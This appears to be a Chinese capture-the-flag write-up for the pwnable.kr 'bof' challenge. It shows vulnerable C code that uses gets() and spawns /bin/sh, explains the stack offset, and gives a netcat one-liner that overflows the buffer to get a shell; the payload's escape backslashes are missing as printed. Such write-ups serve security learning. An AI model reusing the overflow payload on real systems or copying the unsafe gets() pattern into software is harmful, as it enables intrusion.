- 先看程序
- 下载相应代码和程序。
- 查看源码。
#include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key) { char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe) { system("/bin/sh"); } else { printf("Nah.. "); } } int main(int argc, char* argv[]) { func(0xdeadbeef); return 0; }
- 只要 key == 0xcafebabe 就可以执行本机的/bin/sh,所以只要让key等于0xcafebabe即可,但是,输入的key确是0xdeadbeef明显不同,但是我们可以利用那个gets输入,可以溢出func(0xdeadbeef)这个输入参数。
- IDA打开软件F5查看,发现char s //[sp + 1Ch] [bp - 2Ch] 说明,这个字符串s 是从[bp - 2Ch]处开始进入栈缓冲区的,所以我们只要覆盖2C字节,再加上EBP,EIP,就可以成功覆盖第一个变量,也就是func里面的参数,只要把它覆盖成我们想要的参数0xcafebabe即可。
- 我们写一个简单的脚本:
cat <(python -c "print 'x11'*52+'xbexbaxfexca'") - | nc pwnable.kr 9000
- 前面52个字符任意都可,后面四个是我们特定制定的参数,也就是:0xcafebabe。
- 执行成功后cat flag即可得到flag值。
